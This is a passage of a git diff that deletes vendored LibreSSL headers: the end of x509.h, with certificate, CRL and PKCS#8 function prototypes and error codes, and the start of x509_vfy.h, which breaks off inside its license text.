-X509_CERT_PAIR *d2i_X509_CERT_PAIR(X509_CERT_PAIR **a, const unsigned char **in, long len);
-int i2d_X509_CERT_PAIR(X509_CERT_PAIR *a, unsigned char **out);
-extern const ASN1_ITEM X509_CERT_PAIR_it;
-
-int X509_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	     CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int X509_set_ex_data(X509 *r, int idx, void *arg);
-void *X509_get_ex_data(X509 *r, int idx);
-int		i2d_X509_AUX(X509 *a,unsigned char **pp);
-X509 *		d2i_X509_AUX(X509 **a,const unsigned char **pp,long length);
-
-int X509_alias_set1(X509 *x, unsigned char *name, int len);
-int X509_keyid_set1(X509 *x, unsigned char *id, int len);
-unsigned char * X509_alias_get0(X509 *x, int *len);
-unsigned char * X509_keyid_get0(X509 *x, int *len);
-int (*X509_TRUST_set_default(int (*trust)(int , X509 *, int)))(int, X509 *, int);
-int X509_TRUST_set(int *t, int trust);
-int X509_add1_trust_object(X509 *x, ASN1_OBJECT *obj);
-int X509_add1_reject_object(X509 *x, ASN1_OBJECT *obj);
-void X509_trust_clear(X509 *x);
-void X509_reject_clear(X509 *x);
-
-X509_REVOKED *X509_REVOKED_new(void);
-void X509_REVOKED_free(X509_REVOKED *a);
-X509_REVOKED *d2i_X509_REVOKED(X509_REVOKED **a, const unsigned char **in, long len);
-int i2d_X509_REVOKED(X509_REVOKED *a, unsigned char **out);
-extern const ASN1_ITEM X509_REVOKED_it;
-X509_CRL_INFO *X509_CRL_INFO_new(void);
-void X509_CRL_INFO_free(X509_CRL_INFO *a);
-X509_CRL_INFO *d2i_X509_CRL_INFO(X509_CRL_INFO **a, const unsigned char **in, long len);
-int i2d_X509_CRL_INFO(X509_CRL_INFO *a, unsigned char **out);
-extern const ASN1_ITEM X509_CRL_INFO_it;
-X509_CRL *X509_CRL_new(void);
-void X509_CRL_free(X509_CRL *a);
-X509_CRL *d2i_X509_CRL(X509_CRL **a, const unsigned char **in, long len);
-int i2d_X509_CRL(X509_CRL *a, unsigned char **out);
-extern const ASN1_ITEM X509_CRL_it;
-
-int X509_CRL_add0_revoked(X509_CRL *crl, X509_REVOKED *rev);
-int X509_CRL_get0_by_serial(X509_CRL *crl,
-		X509_REVOKED **ret, ASN1_INTEGER *serial);
-int X509_CRL_get0_by_cert(X509_CRL *crl, X509_REVOKED **ret, X509 *x);
-
-X509_PKEY *	X509_PKEY_new(void );
-void		X509_PKEY_free(X509_PKEY *a);
-
-NETSCAPE_SPKI *NETSCAPE_SPKI_new(void);
-void NETSCAPE_SPKI_free(NETSCAPE_SPKI *a);
-NETSCAPE_SPKI *d2i_NETSCAPE_SPKI(NETSCAPE_SPKI **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_SPKI(NETSCAPE_SPKI *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_SPKI_it;
-NETSCAPE_SPKAC *NETSCAPE_SPKAC_new(void);
-void NETSCAPE_SPKAC_free(NETSCAPE_SPKAC *a);
-NETSCAPE_SPKAC *d2i_NETSCAPE_SPKAC(NETSCAPE_SPKAC **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_SPKAC(NETSCAPE_SPKAC *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_SPKAC_it;
-NETSCAPE_CERT_SEQUENCE *NETSCAPE_CERT_SEQUENCE_new(void);
-void NETSCAPE_CERT_SEQUENCE_free(NETSCAPE_CERT_SEQUENCE *a);
-NETSCAPE_CERT_SEQUENCE *d2i_NETSCAPE_CERT_SEQUENCE(NETSCAPE_CERT_SEQUENCE **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_CERT_SEQUENCE(NETSCAPE_CERT_SEQUENCE *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_CERT_SEQUENCE_it;
-
-#ifndef OPENSSL_NO_EVP
-X509_INFO *	X509_INFO_new(void);
-void		X509_INFO_free(X509_INFO *a);
-char *		X509_NAME_oneline(X509_NAME *a,char *buf,int size);
-
-int ASN1_item_digest(const ASN1_ITEM *it,const EVP_MD *type,void *data,
-	unsigned char *md,unsigned int *len);
-
-int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *algor1,
-	ASN1_BIT_STRING *signature,void *data,EVP_PKEY *pkey);
-
-int ASN1_item_sign(const ASN1_ITEM *it, X509_ALGOR *algor1, X509_ALGOR *algor2,
-	ASN1_BIT_STRING *signature,
-	void *data, EVP_PKEY *pkey, const EVP_MD *type);
-int ASN1_item_sign_ctx(const ASN1_ITEM *it,
-		X509_ALGOR *algor1, X509_ALGOR *algor2,
-	     	ASN1_BIT_STRING *signature, void *asn, EVP_MD_CTX *ctx);
-#endif
-
-int 		X509_set_version(X509 *x,long version);
-int 		X509_set_serialNumber(X509 *x, ASN1_INTEGER *serial);
-ASN1_INTEGER *	X509_get_serialNumber(X509 *x);
-int 		X509_set_issuer_name(X509 *x, X509_NAME *name);
-X509_NAME *	X509_get_issuer_name(X509 *a);
-int 		X509_set_subject_name(X509 *x, X509_NAME *name);
-X509_NAME *	X509_get_subject_name(X509 *a);
-int 		X509_set_notBefore(X509 *x, const ASN1_TIME *tm);
-int 		X509_set_notAfter(X509 *x, const ASN1_TIME *tm);
-int 		X509_set_pubkey(X509 *x, EVP_PKEY *pkey);
-EVP_PKEY *	X509_get_pubkey(X509 *x);
-ASN1_BIT_STRING * X509_get0_pubkey_bitstr(const X509 *x);
-int		X509_certificate_type(X509 *x,EVP_PKEY *pubkey /* optional */);
-
-int		X509_REQ_set_version(X509_REQ *x,long version);
-int		X509_REQ_set_subject_name(X509_REQ *req,X509_NAME *name);
-int		X509_REQ_set_pubkey(X509_REQ *x, EVP_PKEY *pkey);
-EVP_PKEY *	X509_REQ_get_pubkey(X509_REQ *req);
-int		X509_REQ_extension_nid(int nid);
-int *		X509_REQ_get_extension_nids(void);
-void		X509_REQ_set_extension_nids(int *nids);
-STACK_OF(X509_EXTENSION) *X509_REQ_get_extensions(X509_REQ *req);
-int X509_REQ_add_extensions_nid(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts,
-				int nid);
-int X509_REQ_add_extensions(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts);
-int X509_REQ_get_attr_count(const X509_REQ *req);
-int X509_REQ_get_attr_by_NID(const X509_REQ *req, int nid,
-			  int lastpos);
-int X509_REQ_get_attr_by_OBJ(const X509_REQ *req, ASN1_OBJECT *obj,
-			  int lastpos);
-X509_ATTRIBUTE *X509_REQ_get_attr(const X509_REQ *req, int loc);
-X509_ATTRIBUTE *X509_REQ_delete_attr(X509_REQ *req, int loc);
-int X509_REQ_add1_attr(X509_REQ *req, X509_ATTRIBUTE *attr);
-int X509_REQ_add1_attr_by_OBJ(X509_REQ *req,
-			const ASN1_OBJECT *obj, int type,
-			const unsigned char *bytes, int len);
-int X509_REQ_add1_attr_by_NID(X509_REQ *req,
-			int nid, int type,
-			const unsigned char *bytes, int len);
-int X509_REQ_add1_attr_by_txt(X509_REQ *req,
-			const char *attrname, int type,
-			const unsigned char *bytes, int len);
-
-int X509_CRL_set_version(X509_CRL *x, long version);
-int X509_CRL_set_issuer_name(X509_CRL *x, X509_NAME *name);
-int X509_CRL_set_lastUpdate(X509_CRL *x, const ASN1_TIME *tm);
-int X509_CRL_set_nextUpdate(X509_CRL *x, const ASN1_TIME *tm);
-int X509_CRL_sort(X509_CRL *crl);
-
-int X509_REVOKED_set_serialNumber(X509_REVOKED *x, ASN1_INTEGER *serial);
-int X509_REVOKED_set_revocationDate(X509_REVOKED *r, ASN1_TIME *tm);
-
-int		X509_REQ_check_private_key(X509_REQ *x509,EVP_PKEY *pkey);
-
-int		X509_check_private_key(X509 *x509,EVP_PKEY *pkey);
-
-int		X509_issuer_and_serial_cmp(const X509 *a, const X509 *b);
-unsigned long	X509_issuer_and_serial_hash(X509 *a);
-
-int		X509_issuer_name_cmp(const X509 *a, const X509 *b);
-unsigned long	X509_issuer_name_hash(X509 *a);
-
-int		X509_subject_name_cmp(const X509 *a, const X509 *b);
-unsigned long	X509_subject_name_hash(X509 *x);
-
-#ifndef OPENSSL_NO_MD5
-unsigned long	X509_issuer_name_hash_old(X509 *a);
-unsigned long	X509_subject_name_hash_old(X509 *x);
-#endif
-
-int		X509_cmp(const X509 *a, const X509 *b);
-int		X509_NAME_cmp(const X509_NAME *a, const X509_NAME *b);
-unsigned long	X509_NAME_hash(X509_NAME *x);
-unsigned long	X509_NAME_hash_old(X509_NAME *x);
-
-int		X509_CRL_cmp(const X509_CRL *a, const X509_CRL *b);
-int		X509_CRL_match(const X509_CRL *a, const X509_CRL *b);
-int		X509_print_ex_fp(FILE *bp,X509 *x, unsigned long nmflag, unsigned long cflag);
-int		X509_print_fp(FILE *bp,X509 *x);
-int		X509_CRL_print_fp(FILE *bp,X509_CRL *x);
-int		X509_REQ_print_fp(FILE *bp,X509_REQ *req);
-int X509_NAME_print_ex_fp(FILE *fp, X509_NAME *nm, int indent, unsigned long flags);
-
-#ifndef OPENSSL_NO_BIO
-int		X509_NAME_print(BIO *bp, X509_NAME *name, int obase);
-int X509_NAME_print_ex(BIO *out, X509_NAME *nm, int indent, unsigned long flags);
-int		X509_print_ex(BIO *bp,X509 *x, unsigned long nmflag, unsigned long cflag);
-int		X509_print(BIO *bp,X509 *x);
-int		X509_ocspid_print(BIO *bp,X509 *x);
-int		X509_CERT_AUX_print(BIO *bp,X509_CERT_AUX *x, int indent);
-int		X509_CRL_print(BIO *bp,X509_CRL *x);
-int		X509_REQ_print_ex(BIO *bp, X509_REQ *x, unsigned long nmflag, unsigned long cflag);
-int		X509_REQ_print(BIO *bp,X509_REQ *req);
-#endif
-
-int 		X509_NAME_entry_count(X509_NAME *name);
-int 		X509_NAME_get_text_by_NID(X509_NAME *name, int nid,
-			char *buf,int len);
-int		X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj,
-			char *buf,int len);
-
-/* NOTE: you should be passsing -1, not 0 as lastpos.  The functions that use
- * lastpos, search after that position on. */
-int 		X509_NAME_get_index_by_NID(X509_NAME *name,int nid,int lastpos);
-int 		X509_NAME_get_index_by_OBJ(X509_NAME *name,ASN1_OBJECT *obj,
-			int lastpos);
-X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc);
-X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc);
-int 		X509_NAME_add_entry(X509_NAME *name,X509_NAME_ENTRY *ne,
-			int loc, int set);
-int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type,
-			unsigned char *bytes, int len, int loc, int set);
-int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type,
-			unsigned char *bytes, int len, int loc, int set);
-X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne,
-		const char *field, int type, const unsigned char *bytes, int len);
-X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid,
-			int type,unsigned char *bytes, int len);
-int X509_NAME_add_entry_by_txt(X509_NAME *name, const char *field, int type,
-			const unsigned char *bytes, int len, int loc, int set);
-X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne,
-			ASN1_OBJECT *obj, int type,const unsigned char *bytes,
-			int len);
-int 		X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne,
-			ASN1_OBJECT *obj);
-int 		X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type,
-			const unsigned char *bytes, int len);
-ASN1_OBJECT *	X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne);
-ASN1_STRING *	X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne);
-
-int		X509v3_get_ext_count(const STACK_OF(X509_EXTENSION) *x);
-int		X509v3_get_ext_by_NID(const STACK_OF(X509_EXTENSION) *x,
-				      int nid, int lastpos);
-int		X509v3_get_ext_by_OBJ(const STACK_OF(X509_EXTENSION) *x,
-				      ASN1_OBJECT *obj,int lastpos);
-int		X509v3_get_ext_by_critical(const STACK_OF(X509_EXTENSION) *x,
-					   int crit, int lastpos);
-X509_EXTENSION *X509v3_get_ext(const STACK_OF(X509_EXTENSION) *x, int loc);
-X509_EXTENSION *X509v3_delete_ext(STACK_OF(X509_EXTENSION) *x, int loc);
-STACK_OF(X509_EXTENSION) *X509v3_add_ext(STACK_OF(X509_EXTENSION) **x,
-					 X509_EXTENSION *ex, int loc);
-
-int		X509_get_ext_count(X509 *x);
-int		X509_get_ext_by_NID(X509 *x, int nid, int lastpos);
-int		X509_get_ext_by_OBJ(X509 *x,ASN1_OBJECT *obj,int lastpos);
-int		X509_get_ext_by_critical(X509 *x, int crit, int lastpos);
-X509_EXTENSION *X509_get_ext(X509 *x, int loc);
-X509_EXTENSION *X509_delete_ext(X509 *x, int loc);
-int		X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc);
-void	*	X509_get_ext_d2i(X509 *x, int nid, int *crit, int *idx);
-int		X509_add1_ext_i2d(X509 *x, int nid, void *value, int crit,
-							unsigned long flags);
-
-int		X509_CRL_get_ext_count(X509_CRL *x);
-int		X509_CRL_get_ext_by_NID(X509_CRL *x, int nid, int lastpos);
-int		X509_CRL_get_ext_by_OBJ(X509_CRL *x,ASN1_OBJECT *obj,int lastpos);
-int		X509_CRL_get_ext_by_critical(X509_CRL *x, int crit, int lastpos);
-X509_EXTENSION *X509_CRL_get_ext(X509_CRL *x, int loc);
-X509_EXTENSION *X509_CRL_delete_ext(X509_CRL *x, int loc);
-int		X509_CRL_add_ext(X509_CRL *x, X509_EXTENSION *ex, int loc);
-void	*	X509_CRL_get_ext_d2i(X509_CRL *x, int nid, int *crit, int *idx);
-int		X509_CRL_add1_ext_i2d(X509_CRL *x, int nid, void *value, int crit,
-							unsigned long flags);
-
-int		X509_REVOKED_get_ext_count(X509_REVOKED *x);
-int		X509_REVOKED_get_ext_by_NID(X509_REVOKED *x, int nid, int lastpos);
-int		X509_REVOKED_get_ext_by_OBJ(X509_REVOKED *x,ASN1_OBJECT *obj,int lastpos);
-int		X509_REVOKED_get_ext_by_critical(X509_REVOKED *x, int crit, int lastpos);
-X509_EXTENSION *X509_REVOKED_get_ext(X509_REVOKED *x, int loc);
-X509_EXTENSION *X509_REVOKED_delete_ext(X509_REVOKED *x, int loc);
-int		X509_REVOKED_add_ext(X509_REVOKED *x, X509_EXTENSION *ex, int loc);
-void	*	X509_REVOKED_get_ext_d2i(X509_REVOKED *x, int nid, int *crit, int *idx);
-int		X509_REVOKED_add1_ext_i2d(X509_REVOKED *x, int nid, void *value, int crit,
-							unsigned long flags);
-
-X509_EXTENSION *X509_EXTENSION_create_by_NID(X509_EXTENSION **ex,
-			int nid, int crit, ASN1_OCTET_STRING *data);
-X509_EXTENSION *X509_EXTENSION_create_by_OBJ(X509_EXTENSION **ex,
-			ASN1_OBJECT *obj,int crit,ASN1_OCTET_STRING *data);
-int		X509_EXTENSION_set_object(X509_EXTENSION *ex,ASN1_OBJECT *obj);
-int		X509_EXTENSION_set_critical(X509_EXTENSION *ex, int crit);
-int		X509_EXTENSION_set_data(X509_EXTENSION *ex,
-			ASN1_OCTET_STRING *data);
-ASN1_OBJECT *	X509_EXTENSION_get_object(X509_EXTENSION *ex);
-ASN1_OCTET_STRING *X509_EXTENSION_get_data(X509_EXTENSION *ne);
-int		X509_EXTENSION_get_critical(X509_EXTENSION *ex);
-
-int X509at_get_attr_count(const STACK_OF(X509_ATTRIBUTE) *x);
-int X509at_get_attr_by_NID(const STACK_OF(X509_ATTRIBUTE) *x, int nid,
-			  int lastpos);
-int X509at_get_attr_by_OBJ(const STACK_OF(X509_ATTRIBUTE) *sk, ASN1_OBJECT *obj,
-			  int lastpos);
-X509_ATTRIBUTE *X509at_get_attr(const STACK_OF(X509_ATTRIBUTE) *x, int loc);
-X509_ATTRIBUTE *X509at_delete_attr(STACK_OF(X509_ATTRIBUTE) *x, int loc);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr(STACK_OF(X509_ATTRIBUTE) **x,
-					 X509_ATTRIBUTE *attr);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_OBJ(STACK_OF(X509_ATTRIBUTE) **x,
-			const ASN1_OBJECT *obj, int type,
-			const unsigned char *bytes, int len);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_NID(STACK_OF(X509_ATTRIBUTE) **x,
-			int nid, int type,
-			const unsigned char *bytes, int len);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_txt(STACK_OF(X509_ATTRIBUTE) **x,
-			const char *attrname, int type,
-			const unsigned char *bytes, int len);
-void *X509at_get0_data_by_OBJ(STACK_OF(X509_ATTRIBUTE) *x,
-				ASN1_OBJECT *obj, int lastpos, int type);
-X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_NID(X509_ATTRIBUTE **attr, int nid,
-	     int atrtype, const void *data, int len);
-X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_OBJ(X509_ATTRIBUTE **attr,
-	     const ASN1_OBJECT *obj, int atrtype, const void *data, int len);
-X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_txt(X509_ATTRIBUTE **attr,
-		const char *atrname, int type, const unsigned char *bytes, int len);
-int X509_ATTRIBUTE_set1_object(X509_ATTRIBUTE *attr, const ASN1_OBJECT *obj);
-int X509_ATTRIBUTE_set1_data(X509_ATTRIBUTE *attr, int attrtype, const void *data, int len);
-void *X509_ATTRIBUTE_get0_data(X509_ATTRIBUTE *attr, int idx,
-					int atrtype, void *data);
-int X509_ATTRIBUTE_count(X509_ATTRIBUTE *attr);
-ASN1_OBJECT *X509_ATTRIBUTE_get0_object(X509_ATTRIBUTE *attr);
-ASN1_TYPE *X509_ATTRIBUTE_get0_type(X509_ATTRIBUTE *attr, int idx);
-
-int EVP_PKEY_get_attr_count(const EVP_PKEY *key);
-int EVP_PKEY_get_attr_by_NID(const EVP_PKEY *key, int nid,
-			  int lastpos);
-int EVP_PKEY_get_attr_by_OBJ(const EVP_PKEY *key, ASN1_OBJECT *obj,
-			  int lastpos);
-X509_ATTRIBUTE *EVP_PKEY_get_attr(const EVP_PKEY *key, int loc);
-X509_ATTRIBUTE *EVP_PKEY_delete_attr(EVP_PKEY *key, int loc);
-int EVP_PKEY_add1_attr(EVP_PKEY *key, X509_ATTRIBUTE *attr);
-int EVP_PKEY_add1_attr_by_OBJ(EVP_PKEY *key,
-			const ASN1_OBJECT *obj, int type,
-			const unsigned char *bytes, int len);
-int EVP_PKEY_add1_attr_by_NID(EVP_PKEY *key,
-			int nid, int type,
-			const unsigned char *bytes, int len);
-int EVP_PKEY_add1_attr_by_txt(EVP_PKEY *key,
-			const char *attrname, int type,
-			const unsigned char *bytes, int len);
-
-int		X509_verify_cert(X509_STORE_CTX *ctx);
-
-/* lookup a cert from a X509 STACK */
-X509 *X509_find_by_issuer_and_serial(STACK_OF(X509) *sk,X509_NAME *name,
-				     ASN1_INTEGER *serial);
-X509 *X509_find_by_subject(STACK_OF(X509) *sk,X509_NAME *name);
-
-PBEPARAM *PBEPARAM_new(void);
-void PBEPARAM_free(PBEPARAM *a);
-PBEPARAM *d2i_PBEPARAM(PBEPARAM **a, const unsigned char **in, long len);
-int i2d_PBEPARAM(PBEPARAM *a, unsigned char **out);
-extern const ASN1_ITEM PBEPARAM_it;
-PBE2PARAM *PBE2PARAM_new(void);
-void PBE2PARAM_free(PBE2PARAM *a);
-PBE2PARAM *d2i_PBE2PARAM(PBE2PARAM **a, const unsigned char **in, long len);
-int i2d_PBE2PARAM(PBE2PARAM *a, unsigned char **out);
-extern const ASN1_ITEM PBE2PARAM_it;
-PBKDF2PARAM *PBKDF2PARAM_new(void);
-void PBKDF2PARAM_free(PBKDF2PARAM *a);
-PBKDF2PARAM *d2i_PBKDF2PARAM(PBKDF2PARAM **a, const unsigned char **in, long len);
-int i2d_PBKDF2PARAM(PBKDF2PARAM *a, unsigned char **out);
-extern const ASN1_ITEM PBKDF2PARAM_it;
-
-int PKCS5_pbe_set0_algor(X509_ALGOR *algor, int alg, int iter,
-				const unsigned char *salt, int saltlen);
-
-X509_ALGOR *PKCS5_pbe_set(int alg, int iter,
-				const unsigned char *salt, int saltlen);
-X509_ALGOR *PKCS5_pbe2_set(const EVP_CIPHER *cipher, int iter,
-					 unsigned char *salt, int saltlen);
-X509_ALGOR *PKCS5_pbe2_set_iv(const EVP_CIPHER *cipher, int iter,
-				 unsigned char *salt, int saltlen,
-				 unsigned char *aiv, int prf_nid);
-
-X509_ALGOR *PKCS5_pbkdf2_set(int iter, unsigned char *salt, int saltlen,
-				int prf_nid, int keylen);
-
-/* PKCS#8 utilities */
-
-PKCS8_PRIV_KEY_INFO *PKCS8_PRIV_KEY_INFO_new(void);
-void PKCS8_PRIV_KEY_INFO_free(PKCS8_PRIV_KEY_INFO *a);
-PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO(PKCS8_PRIV_KEY_INFO **a, const unsigned char **in, long len);
-int i2d_PKCS8_PRIV_KEY_INFO(PKCS8_PRIV_KEY_INFO *a, unsigned char **out);
-extern const ASN1_ITEM PKCS8_PRIV_KEY_INFO_it;
-
-EVP_PKEY *EVP_PKCS82PKEY(PKCS8_PRIV_KEY_INFO *p8);
-PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8(EVP_PKEY *pkey);
-PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8_broken(EVP_PKEY *pkey, int broken);
-PKCS8_PRIV_KEY_INFO *PKCS8_set_broken(PKCS8_PRIV_KEY_INFO *p8, int broken);
-
-int PKCS8_pkey_set0(PKCS8_PRIV_KEY_INFO *priv, ASN1_OBJECT *aobj,
-			int version, int ptype, void *pval,
-				unsigned char *penc, int penclen);
-int PKCS8_pkey_get0(ASN1_OBJECT **ppkalg,
-		const unsigned char **pk, int *ppklen,
-		X509_ALGOR **pa,
-		PKCS8_PRIV_KEY_INFO *p8);
-
-int X509_PUBKEY_set0_param(X509_PUBKEY *pub, ASN1_OBJECT *aobj,
-					int ptype, void *pval,
-					unsigned char *penc, int penclen);
-int X509_PUBKEY_get0_param(ASN1_OBJECT **ppkalg,
-		const unsigned char **pk, int *ppklen,
-		X509_ALGOR **pa,
-		X509_PUBKEY *pub);
-
-int X509_check_trust(X509 *x, int id, int flags);
-int X509_TRUST_get_count(void);
-X509_TRUST * X509_TRUST_get0(int idx);
-int X509_TRUST_get_by_id(int id);
-int X509_TRUST_add(int id, int flags, int (*ck)(X509_TRUST *, X509 *, int),
-					char *name, int arg1, void *arg2);
-void X509_TRUST_cleanup(void);
-int X509_TRUST_get_flags(X509_TRUST *xp);
-char *X509_TRUST_get0_name(X509_TRUST *xp);
-int X509_TRUST_get_trust(X509_TRUST *xp);
-
-int X509_up_ref(X509 *x);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_X509_strings(void);
-
-/* Error codes for the X509 functions. */
-
-/* Function codes. */
-#define X509_F_ADD_CERT_DIR				 100
-#define X509_F_BY_FILE_CTRL				 101
-#define X509_F_CHECK_POLICY				 145
-#define X509_F_DIR_CTRL					 102
-#define X509_F_GET_CERT_BY_SUBJECT			 103
-#define X509_F_NETSCAPE_SPKI_B64_DECODE			 129
-#define X509_F_NETSCAPE_SPKI_B64_ENCODE			 130
-#define X509_F_X509AT_ADD1_ATTR				 135
-#define X509_F_X509V3_ADD_EXT				 104
-#define X509_F_X509_ATTRIBUTE_CREATE_BY_NID		 136
-#define X509_F_X509_ATTRIBUTE_CREATE_BY_OBJ		 137
-#define X509_F_X509_ATTRIBUTE_CREATE_BY_TXT		 140
-#define X509_F_X509_ATTRIBUTE_GET0_DATA			 139
-#define X509_F_X509_ATTRIBUTE_SET1_DATA			 138
-#define X509_F_X509_CHECK_PRIVATE_KEY			 128
-#define X509_F_X509_CRL_PRINT_FP			 147
-#define X509_F_X509_EXTENSION_CREATE_BY_NID		 108
-#define X509_F_X509_EXTENSION_CREATE_BY_OBJ		 109
-#define X509_F_X509_GET_PUBKEY_PARAMETERS		 110
-#define X509_F_X509_LOAD_CERT_CRL_FILE			 132
-#define X509_F_X509_LOAD_CERT_FILE			 111
-#define X509_F_X509_LOAD_CRL_FILE			 112
-#define X509_F_X509_NAME_ADD_ENTRY			 113
-#define X509_F_X509_NAME_ENTRY_CREATE_BY_NID		 114
-#define X509_F_X509_NAME_ENTRY_CREATE_BY_TXT		 131
-#define X509_F_X509_NAME_ENTRY_SET_OBJECT		 115
-#define X509_F_X509_NAME_ONELINE			 116
-#define X509_F_X509_NAME_PRINT				 117
-#define X509_F_X509_PRINT_EX_FP				 118
-#define X509_F_X509_PUBKEY_GET				 119
-#define X509_F_X509_PUBKEY_SET				 120
-#define X509_F_X509_REQ_CHECK_PRIVATE_KEY		 144
-#define X509_F_X509_REQ_PRINT_EX			 121
-#define X509_F_X509_REQ_PRINT_FP			 122
-#define X509_F_X509_REQ_TO_X509				 123
-#define X509_F_X509_STORE_ADD_CERT			 124
-#define X509_F_X509_STORE_ADD_CRL			 125
-#define X509_F_X509_STORE_CTX_GET1_ISSUER		 146
-#define X509_F_X509_STORE_CTX_INIT			 143
-#define X509_F_X509_STORE_CTX_NEW			 142
-#define X509_F_X509_STORE_CTX_PURPOSE_INHERIT		 134
-#define X509_F_X509_TO_X509_REQ				 126
-#define X509_F_X509_TRUST_ADD				 133
-#define X509_F_X509_TRUST_SET				 141
-#define X509_F_X509_VERIFY_CERT				 127
-
-/* Reason codes. */
-#define X509_R_BAD_X509_FILETYPE			 100
-#define X509_R_BASE64_DECODE_ERROR			 118
-#define X509_R_CANT_CHECK_DH_KEY			 114
-#define X509_R_CERT_ALREADY_IN_HASH_TABLE		 101
-#define X509_R_ERR_ASN1_LIB				 102
-#define X509_R_INVALID_DIRECTORY			 113
-#define X509_R_INVALID_FIELD_NAME			 119
-#define X509_R_INVALID_TRUST				 123
-#define X509_R_KEY_TYPE_MISMATCH			 115
-#define X509_R_KEY_VALUES_MISMATCH			 116
-#define X509_R_LOADING_CERT_DIR				 103
-#define X509_R_LOADING_DEFAULTS				 104
-#define X509_R_METHOD_NOT_SUPPORTED			 124
-#define X509_R_NO_CERT_SET_FOR_US_TO_VERIFY		 105
-#define X509_R_PUBLIC_KEY_DECODE_ERROR			 125
-#define X509_R_PUBLIC_KEY_ENCODE_ERROR			 126
-#define X509_R_SHOULD_RETRY				 106
-#define X509_R_UNABLE_TO_FIND_PARAMETERS_IN_CHAIN	 107
-#define X509_R_UNABLE_TO_GET_CERTS_PUBLIC_KEY		 108
-#define X509_R_UNKNOWN_KEY_TYPE				 117
-#define X509_R_UNKNOWN_NID				 109
-#define X509_R_UNKNOWN_PURPOSE_ID			 121
-#define X509_R_UNKNOWN_TRUST_ID				 120
-#define X509_R_UNSUPPORTED_ALGORITHM			 111
-#define X509_R_WRONG_LOOKUP_TYPE			 112
-#define X509_R_WRONG_TYPE				 122
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/x509_vfy.h b/thirdparty/libressl/include/openssl/x509_vfy.h
deleted file mode 100644
index b58d49d..0000000
--- a/thirdparty/libressl/include/openssl/x509_vfy.h
+++ /dev/null
@@ -1,582 +0,0 @@
-/* $OpenBSD: x509_vfy.h,v 1.18 2016/12/21 15:15:45 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- * 
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- * 
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- * 
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from 
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- * 
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
